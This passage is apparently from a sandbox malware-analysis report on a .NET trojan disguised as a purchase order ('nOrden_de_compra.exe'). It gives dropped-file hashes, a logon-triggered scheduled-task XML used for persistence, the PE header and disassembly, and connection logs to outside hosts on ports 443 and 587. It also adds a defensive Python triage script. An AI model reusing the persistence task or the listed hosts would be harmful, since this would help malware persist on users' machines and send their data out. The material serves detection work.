                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll"
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 2232
Entropy (8bit): 5.380805901110357
Encrypted: false
SSDEEP: 48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZeUyus:lGLHyIFKL3IZ2KRH9OugIs
MD5: E522B2005C3F8CEE121092726F0796D1
SHA1: B3ABC6E4DEDB76609E5F101ED018B4A5C7C45404
SHA-256: 905C2721C090CBDA71FD37A5CACD974C87171364DD5ACBC8C3D7D58FE1D58CB5
SHA-512: 95BA8FB518A3067855DB06037CBB1DAF3CED0AAABD84716CF77EB4BD89F08870C3D3D7507FD6159A427AACC76BDF5ABB38B5607EEF92514CB38DBE3710F419AE
Malicious: false
                                        Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
The same 60-byte file, with identical hashes and the same preview text, is recorded seven more times, each with Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.
Process: C:\Users\user\Desktop\nOrden_de_compra.exe
File Type: XML 1.0 document, ASCII text
Category: dropped
Size (bytes): 1597
Entropy (8bit): 5.092628755864273
Encrypted: false
SSDEEP: 24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLSxvn:cge7QYrFdOFzOzN33ODOiDdKrsuTqv
MD5: F331AB1DFBD53BD28DC8A8DAEAC36A31
SHA1: 57CDFBFDD7668FC596D8F318CF99CE2E20FBD229
SHA-256: 54C1A5F0D3AB93240356CAA068C0FE585FC7B19DEC228B8EC17A4352AD82F725
SHA-512: BAB89F3B60512C408E03DD31338D5D6AFE849E19C4DA1840EB288068E5EAD19CA04377DFF765F6939495D0469C067B097B3B4AF43CFCF1C3A11D6F63A0CC7B5C
Malicious: true
                                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run
Process: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe
File Type: XML 1.0 document, ASCII text
Category: dropped
Size (bytes): 1597
Entropy (8bit): 5.092628755864273
Encrypted: false
SSDEEP: 24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLSxvn:cge7QYrFdOFzOzN33ODOiDdKrsuTqv
MD5: F331AB1DFBD53BD28DC8A8DAEAC36A31
SHA1: 57CDFBFDD7668FC596D8F318CF99CE2E20FBD229
SHA-256: 54C1A5F0D3AB93240356CAA068C0FE585FC7B19DEC228B8EC17A4352AD82F725
SHA-512: BAB89F3B60512C408E03DD31338D5D6AFE849E19C4DA1840EB288068E5EAD19CA04377DFF765F6939495D0469C067B097B3B4AF43CFCF1C3A11D6F63A0CC7B5C
Malicious: false
                                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run
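The task definition above is the persistence artifact to check for on any host that ran this sample: a LogonTrigger, RunLevel LeastPrivilege (so no elevation is needed to register it), a RegistrationInfo Date of 2014 on a task the timeline shows being created during the 2024 analysis, and, per that timeline, an action that starts C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe. The following is an added example, not code from the report or from Joe Sandbox: a Python triage of an exported task XML that flags exactly that combination. The sample task XML is constructed here, modelled on the dropped file; its Actions element is assumed because the report's preview is truncated before it, and the benign comparison task is invented. Note that the dropped file is ASCII yet declares encoding="UTF-16", so the decoder goes by the byte-order mark rather than by the declaration.

```python
"""Triage a Task Scheduler XML definition for the persistence pattern seen above:
a logon-triggered task whose action runs a binary from a user-writable directory."""
import re
import xml.etree.ElementTree as ET
from datetime import datetime

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Locations a standard user can write to without elevation. A task whose <Exec>
# command lives under one of these was registered by something running as that
# user, not by an installer or an administrator.
USER_WRITABLE = (
    r"\appdata\roaming", r"\appdata\local\temp", r"\users\public",
    r"\programdata", r"\downloads",
)

# When the task really appeared on the host. Here: the report timeline entry
# "14:03:59 Task Scheduler Run new task: nNdsLvHyWi" on 2024-02-02.
OBSERVED_REGISTRATION = datetime(2024, 2, 2, 14, 3, 59)

# Constructed sample modelled on the dropped task XML above. The report preview
# stops inside <Settings>, so the <Actions> block is assumed; its command is the
# path the timeline shows the task starting.
SUSPICIOUS_TASK = b"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2014-10-25T14:27:44.8929027</Date>
    <Author>user-PC\\user</Author>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger>
      <Enabled>true</Enabled>
      <UserId>user-PC\\user</UserId>
    </LogonTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>user-PC\\user</UserId>
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>
    <AllowHardTerminate>false</AllowHardTerminate>
    <StartWhenAvailable>true</StartWhenAvailable>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Users\\user\\AppData\\Roaming\\nNdsLvHyWi.exe</Command>
    </Exec>
  </Actions>
</Task>
"""

# Constructed benign task for comparison: daily trigger, system binary, honest date.
BENIGN_TASK = b"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2024-02-02T09:00:00.0000000</Date>
    <Author>CONTOSO\\svc_maint</Author>
  </RegistrationInfo>
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2024-02-02T09:00:00</StartBoundary>
      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author"><RunLevel>LeastPrivilege</RunLevel></Principal>
  </Principals>
  <Actions Context="Author">
    <Exec><Command>C:\\Windows\\System32\\cleanmgr.exe</Command></Exec>
  </Actions>
</Task>
"""


def decode_task_xml(raw: bytes) -> str:
    """Decode by byte-order mark, then drop the XML declaration. Task XML exported
    by Windows is UTF-16 with a BOM, but the dropped file above is plain ASCII
    that still declares encoding="UTF-16"; trusting that header would break the
    parse, so the declaration is removed before the parser sees it."""
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        text = raw.decode("utf-16")
    else:
        text = raw.decode("utf-8", errors="replace")
    return re.sub(r"^\s*<\?xml[^>]*\?>", "", text, count=1)


def triage_task(raw: bytes, registered_at: datetime) -> dict:
    """Return the task's key fields plus a list of persistence findings.
    registered_at is when the task really appeared on the host (Task Scheduler
    operational log, or here the sandbox timeline)."""
    root = ET.fromstring(decode_task_xml(raw))

    def field(path: str) -> str:
        return (root.findtext(path, default="", namespaces=NS) or "").strip()

    commands = [(c.text or "").strip()
                for c in root.findall("t:Actions/t:Exec/t:Command", NS)]
    logon = root.find("t:Triggers/t:LogonTrigger", NS)
    logon_enabled = logon is not None and (
        logon.findtext("t:Enabled", "true", NS).strip().lower() != "false")
    declared_date = field("t:RegistrationInfo/t:Date")

    findings = []
    if any(d in cmd.lower() for cmd in commands for d in USER_WRITABLE):
        findings.append("exec_from_user_writable_dir")
    if logon_enabled:
        findings.append("runs_at_every_logon")
    if declared_date:
        # Trim the 7-digit fraction Windows writes; fromisoformat rejects it on
        # older Pythons. A <Date> years away from the real registration time is
        # a canned template value, not a record of when the task was created.
        declared = datetime.strptime(declared_date[:19], "%Y-%m-%dT%H:%M:%S")
        if abs((registered_at - declared).days) > 1:
            findings.append("registration_date_is_template_value")
    return {
        "author": field("t:RegistrationInfo/t:Author"),
        "run_level": field("t:Principals/t:Principal/t:RunLevel"),
        "commands": commands,
        "declared_date": declared_date,
        "findings": findings,
    }


if __name__ == "__main__":
    for name, sample in (("suspicious", SUSPICIOUS_TASK), ("benign", BENIGN_TASK)):
        print(name, triage_task(sample, OBSERVED_REGISTRATION))
```

On a live host, feed triage_task the file under C:\Windows\System32\Tasks\<name> or the output of `schtasks /Query /TN <name> /XML`, and take registered_at from the Microsoft-Windows-TaskScheduler/Operational log (event 106, task registered) rather than from the XML itself.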
                                        Process:C:\Users\user\Desktop\nOrden_de_compra.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):730624
                                        Entropy (8bit):7.928891623206955
                                        Encrypted:false
                                        SSDEEP:12288:gOd53rD22AAxia+iWUd1jIXbsZ9uXIfa5vWwRkP/l14zAFDQzjgWaqPK6k3LlYl:NrDa5a+iJXIr89fOmnnDQf4bP3LlY
                                        MD5:593BB72286C1C2CE5C2456C7D9585A80
                                        SHA1:CB9BF63F9005D5B4F1BCBCF3EFEAD399A1C960A7
                                        SHA-256:84F0A1001A606072B86D8ECA2C4D9CCEFC71C38FF71D0AAA2F4AE003F802917B
                                        SHA-512:2FD046FC4730A5E912BFC1CD33CDC2601B159F2B55FBFB86ED6BB966DD5D147586E245BB30BDAAF78B568C814985FC488920FAA87FC87D8F9AD0534AB27DAF83
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 63%
                                        • Antivirus: Virustotal, Detection: 43%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{C`...............0..............:... ...@....@.. ....................................@..................................:..O....@.......................`..........p............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B.................:......H............;...............<..........................................^..}.....(.......(.....*.0...........s".....o......(.....*".(.....*..0..+.........,..{.......+....,...{....o........(.....*..0..p.........s....}.....s....}.....s....}.....(......{.... P... ....s....o......{....r...po......{.... .....6s....o......{.....o......{....r...po......{.....o......{...........s....o......{.... P... V...s....o......{....r)..po......{.... .....6s....o......{.....o......{....r9..po...
                                        Process:C:\Users\user\Desktop\nOrden_de_compra.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:false
                                        Preview:[ZoneTransfer]....ZoneId=0
                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):7.928891623206955
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        • DOS Executable Generic (2002/1) 0.01%
                                        File name:nOrden_de_compra.exe
                                        File size:730'624 bytes
                                        MD5:593bb72286c1c2ce5c2456c7d9585a80
                                        SHA1:cb9bf63f9005d5b4f1bcbcf3efead399a1c960a7
                                        SHA256:84f0a1001a606072b86d8eca2c4d9ccefc71c38ff71d0aaa2f4ae003f802917b
                                        SHA512:2fd046fc4730a5e912bfc1cd33cdc2601b159f2b55fbfb86ed6bb966dd5d147586e245bb30bdaaf78b568c814985fc488920faa87fc87d8f9ad0534ab27daf83
                                        SSDEEP:12288:gOd53rD22AAxia+iWUd1jIXbsZ9uXIfa5vWwRkP/l14zAFDQzjgWaqPK6k3LlYl:NrDa5a+iJXIr89fOmnnDQf4bP3LlY
                                        TLSH:D5F4128136BA5FE2C17DDBF825A5858117F23A6B4521FB0CAEC771EF4826F120711A27
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{C`...............0..............:... ...@....@.. ....................................@................................
                                        Icon Hash:00928e8e8686b000
                                        Entrypoint:0x4b3ae6
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0xB560437B [Sat Jun 5 17:33:47 2066 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                        Instruction
                                        jmp dword ptr [00402000h]
                                        xor eax, 39483732h
                                        inc esp
                                        push eax
                                        push edx
                                        dec eax
                                        xor al, 35h
                                        xor eax, 34374553h
                                        inc esi
                                        dec eax
                                        xor al, 38h
                                        aaa
                                        xor eax, 00000000h
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        Name | Virtual Address | Virtual Size | Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb3a92 | 0x4f | .text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb4000 | 0x4cc | .rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb6000 | 0xc | .reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb1ba0 | 0x70 | .text
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                        .text | 0x2000 | 0xb1b04 | 0xb1c00 | e19ea35ec4fd1329aad04e0e94d52111 | False | 0.9214959124472574 | OpenPGP Public Key | 7.935524491398435 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rsrc | 0xb4000 | 0x4cc | 0x600 | 76188ffd4997978ae00d4dd7d437a055 | False | 0.375 | data | 3.7082723271284284 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc | 0xb6000 | 0xc | 0x200 | 0f35781f5f2e411a005a4ff341fc6fdf | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                        RT_VERSION | 0xb4090 | 0x23c | data | | | 0.47027972027972026
                                        RT_MANIFEST | 0xb42dc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                                        DLL | Import
                                        mscoree.dll | _CorExeMain
                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        Feb 2, 2024 14:04:00.360469103 CET | 49702 | 443 | 192.168.2.6 | 173.231.16.76
                                        Feb 2, 2024 14:04:00.360503912 CET | 443 | 49702 | 173.231.16.76 | 192.168.2.6
                                        Feb 2, 2024 14:04:00.360588074 CET | 49702 | 443 | 192.168.2.6 | 173.231.16.76
                                        Feb 2, 2024 14:04:00.368781090 CET | 49702 | 443 | 192.168.2.6 | 173.231.16.76
                                        Feb 2, 2024 14:04:00.368798018 CET | 443 | 49702 | 173.231.16.76 | 192.168.2.6
                                        Feb 2, 2024 14:04:00.849668026 CET | 443 | 49702 | 173.231.16.76 | 192.168.2.6
                                        Feb 2, 2024 14:04:00.849740028 CET | 49702 | 443 | 192.168.2.6 | 173.231.16.76
                                        Feb 2, 2024 14:04:00.852282047 CET | 49702 | 443 | 192.168.2.6 | 173.231.16.76
                                        Feb 2, 2024 14:04:00.852300882 CET | 443 | 49702 | 173.231.16.76 | 192.168.2.6
                                        Feb 2, 2024 14:04:00.852720022 CET | 443 | 49702 | 173.231.16.76 | 192.168.2.6
                                        Feb 2, 2024 14:04:01.057991028 CET | 443 | 49702 | 173.231.16.76 | 192.168.2.6
                                        Feb 2, 2024 14:04:01.058078051 CET | 49702 | 443 | 192.168.2.6 | 173.231.16.76
                                        Feb 2, 2024 14:04:01.146929979 CET | 49702 | 443 | 192.168.2.6 | 173.231.16.76
                                        Feb 2, 2024 14:04:01.193903923 CET | 443 | 49702 | 173.231.16.76 | 192.168.2.6
                                        Feb 2, 2024 14:04:01.302603960 CET | 443 | 49702 | 173.231.16.76 | 192.168.2.6
                                        Feb 2, 2024 14:04:01.302767038 CET | 443 | 49702 | 173.231.16.76 | 192.168.2.6
                                        Feb 2, 2024 14:04:01.302828074 CET | 49702 | 443 | 192.168.2.6 | 173.231.16.76
                                        Feb 2, 2024 14:04:01.308126926 CET | 49702 | 443 | 192.168.2.6 | 173.231.16.76
                                        Feb 2, 2024 14:04:02.470457077 CET | 49703 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:02.705370903 CET | 587 | 49703 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:02.705459118 CET | 49703 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:02.956008911 CET | 587 | 49703 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:02.956404924 CET | 49703 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:03.190959930 CET | 587 | 49703 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:03.193321943 CET | 49703 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:03.308763981 CET | 49706 | 443 | 192.168.2.6 | 173.231.16.76
                                        Feb 2, 2024 14:04:03.308816910 CET | 443 | 49706 | 173.231.16.76 | 192.168.2.6
                                        Feb 2, 2024 14:04:03.308892965 CET | 49706 | 443 | 192.168.2.6 | 173.231.16.76
                                        Feb 2, 2024 14:04:03.315083027 CET | 49706 | 443 | 192.168.2.6 | 173.231.16.76
                                        Feb 2, 2024 14:04:03.315104008 CET | 443 | 49706 | 173.231.16.76 | 192.168.2.6
                                        Feb 2, 2024 14:04:03.429385900 CET | 587 | 49703 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:03.429711103 CET | 49703 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:03.670841932 CET | 587 | 49703 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:03.670888901 CET | 587 | 49703 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:03.670928001 CET | 587 | 49703 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:03.670963049 CET | 587 | 49703 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:03.670965910 CET | 49703 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:03.671084881 CET | 49703 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:03.674313068 CET | 587 | 49703 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:03.704817057 CET | 49703 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:03.788465023 CET | 443 | 49706 | 173.231.16.76 | 192.168.2.6
                                        Feb 2, 2024 14:04:03.788558006 CET | 49706 | 443 | 192.168.2.6 | 173.231.16.76
                                        Feb 2, 2024 14:04:03.790569067 CET | 49706 | 443 | 192.168.2.6 | 173.231.16.76
                                        Feb 2, 2024 14:04:03.790582895 CET | 443 | 49706 | 173.231.16.76 | 192.168.2.6
                                        Feb 2, 2024 14:04:03.790884018 CET | 443 | 49706 | 173.231.16.76 | 192.168.2.6
                                        Feb 2, 2024 14:04:03.902555943 CET | 49706 | 443 | 192.168.2.6 | 173.231.16.76
                                        Feb 2, 2024 14:04:03.939366102 CET | 587 | 49703 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:03.945944071 CET | 443 | 49706 | 173.231.16.76 | 192.168.2.6
                                        Feb 2, 2024 14:04:03.946571112 CET | 49703 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:04.089679956 CET | 443 | 49706 | 173.231.16.76 | 192.168.2.6
                                        Feb 2, 2024 14:04:04.089828014 CET | 443 | 49706 | 173.231.16.76 | 192.168.2.6
                                        Feb 2, 2024 14:04:04.090040922 CET | 49706 | 443 | 192.168.2.6 | 173.231.16.76
                                        Feb 2, 2024 14:04:04.103243113 CET | 49706 | 443 | 192.168.2.6 | 173.231.16.76
                                        Feb 2, 2024 14:04:04.181974888 CET | 587 | 49703 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:04.183073997 CET | 49703 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:04.418435097 CET | 587 | 49703 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:04.419512033 CET | 49703 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:04.665285110 CET | 587 | 49703 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:04.665512085 CET | 49703 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:04.701335907 CET | 49707 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:04.900806904 CET | 587 | 49703 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:04.901240110 CET | 49703 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:04.931474924 CET | 587 | 49707 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:04.931577921 CET | 49707 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:05.166806936 CET | 587 | 49707 | 89.32.46.159 | 192.168.2.6
